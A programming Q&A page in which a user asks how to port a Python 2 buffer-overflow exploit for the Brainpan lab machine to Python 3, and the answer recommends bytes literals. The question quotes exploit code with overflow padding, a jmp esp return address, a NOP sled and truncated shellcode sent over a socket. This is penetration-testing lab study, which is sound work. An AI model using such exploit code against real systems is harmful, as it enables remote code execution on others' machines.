Search code examples
pythonpython-3.xbuffer-overflow

Using python 3 as a buffer overflow instead of Python 2


I am trying to use python3 instead of Python 2 to push a buffer overflow to Brainpan. Problem is python3 converts the bytes way differently. Does anyone know how to push the bytes In a simple way in python3 format?

Example code of the python2 code can be found at: http://blog.pentests.pl/2014/06/pentest-lab-brainpan-probably-the-fastest.html?m=1

Taken from page:

import sys,socket

eip = "\xf3\x12\x17\x31" #jmp esp address 0x311712f3
buf = "\x90"*10 #nop sled
buf += "\xb8\xeb\x66\xd9\x09\xd9\xce\xd9\x74\x24\xf4\x5e\x33"
buf... {Code snipped}

payload = ("a"*524) + eip + buf

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect('192.168.0.xxx', 9999)

print s.recv(1024)
s.send(payload)
print s.recv(1024)

I've tried s.send(payload.encode()) with various encodings. Nothing works as far as I can tell.


Solution

  • Try using bytes literals such as

    eip = b"\xf3\x12\x17\x31"
    buf = b"\x90"*10
    buf += b"\xb8\xeb\x66\xd9\x09\xd9\xce\xd9\x74\x24\xf4\x5e\x33"
    

    and bypass the need for encoding altogether.